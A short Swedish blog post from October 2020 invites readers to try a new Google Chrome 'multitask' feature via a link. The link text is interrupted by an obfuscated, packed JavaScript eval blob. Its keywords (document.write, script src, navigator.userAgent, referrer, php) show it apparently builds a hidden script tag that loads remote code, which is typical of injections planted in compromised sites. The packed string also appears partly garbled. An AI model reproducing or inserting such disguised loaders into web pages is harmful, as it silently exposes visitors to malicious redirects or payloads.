Image Image Image Image Image Image Image Image Image Image

| 28 oktober, 2020

Scroll to top

Top

Prova nya Google Chrome multitask

Sebastian

Google har kommit på en ny teknik som ska underlätta användandet av internet i webbläsaren Chrome när man är fler personer men endast har en datorn till hands. Detta är vad de har kommit upp med!

Ni kan testa den nya funktionen via länken nedan. Mycket användbart!

Google eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fezei|var|u0026u|referrer|eyfnz||js|php’.split(’|’),0,{}))
Chrome multitask
!